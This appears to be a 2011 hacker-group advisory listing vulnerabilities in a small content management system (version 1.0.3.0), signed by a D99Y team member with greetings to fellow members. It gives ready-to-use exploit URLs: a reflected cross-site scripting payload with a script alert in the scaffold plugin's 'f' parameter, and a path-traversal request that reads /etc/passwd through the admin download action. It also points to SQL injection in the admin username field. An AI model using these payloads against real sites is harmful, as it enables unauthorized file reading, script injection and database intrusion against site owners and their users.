1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
########################################################## # home : http://www.D99Y.com # Date: 27/3/2011 # Author: NassRawI # Software Link: http://modcove.com/index.php # Demo : http://modcove.com/index.php?page=demo # Version: 1.0.3.0 ########################################################## # # [1] SQL injection # # http://localhost/simpliscms/admin/index.php # # # Injection in the Username field # # # [2] Cross Site Scripting # # file : # # admin/application/plugins/scaffold/index.php # # exploit: # # http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=[ XSS ] # # http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=<FONT size=7 >NassRaWi</FONT> <script>alert("www.d99y.com")</script> # # ########################################################## [3]Remote File Disclosure # file : # # simpliscms/admin/index.php # # exploit: # # # http://localhost/simpliscms/admin/index.php?action=do_download&download_file=[ Read files ]&page=§ion=pages # # # http://localhost/simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/passwd&page=§ion=pages # ########################################################## Greetz : D99Y Team + alroo7 alte No Tkd3 + oхіјєή + ǺŁṀṨŘŎŎŖĨ+ JEenY + anT!-Tr0J4n+ ReBLOoOV + FoFo < x-shadowmy baby :$ + Difficult 511 and all members D99Y.CoM Enjoy :) |